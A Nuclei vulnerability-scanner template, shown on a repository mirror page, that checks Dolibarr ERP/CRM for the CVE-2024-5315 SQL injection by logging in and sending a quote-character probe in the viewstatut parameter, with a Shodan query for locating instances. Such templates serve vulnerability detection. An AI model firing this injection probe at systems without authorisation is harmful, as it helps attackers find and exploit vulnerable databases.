daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/cves/2024/CVE-2024-5315.yaml

63 lines
2.0 KiB
YAML
Raw Blame History

id: CVE-2024-5315
info:
name: Dolibarr ERP CMS `list.php` - SQL Injection
author: rootxharsh,iamnoooob,pdresearch
severity: critical
description: |
Vulnerabilities in Dolibarr ERP - CRM that affect version 9.0.1 and allow SQL injection.
impact: |
These vulnerabilities could allow a remote attacker to send a specially crafted SQL query to the system and retrieve all the information stored in the database through the parameters viewstatut in /dolibarr/commande/list.php
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-5315
- https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-dolibarrs-erp-cms
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.1
cve-id: CVE-2024-5315
cwe-id: CWE-89
epss-score: 0.00043
epss-percentile: 0.09367
cpe: cpe:2.3:a:dolibarr:dolibarr_erp\\/crm:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: http.title:"Dolibarr"
product: dolibarr_erp\\/crm
vendor: dolibarr
tags: cve,cve2024,dolibarr,erp,sqli,authenticated
variables:
username: "{{username}}"
password: "{{password}}"
http:
- raw:
- |
POST /htdocs/index.php?mainmenu=home HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
loginfunction=loginfunction&username={{username}}&password={{password}}
- |
GET /htdocs/commande/list.php?viewstatut=x%27 HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body_2
words:
- You have an error in your SQL syntax
- type: word
part: header_1
words:
- 'Set-Cookie: DOLSESSID_'
- type: word
part: body_1
words:
- SuperAdmin
# digest: 4a0a0047304502205aa9a7807ff37b2258fd928e7870401314703378f3b216cd235575dbbc134b0d022100c22b514cd4a6ae8de268b62bf3cbddbe470e34407dbbae1c1db4fb9a6f8a6da7:922c64590222798bb761d5b6d8e72950
Reference in New Issue View Git Blame Copy Permalink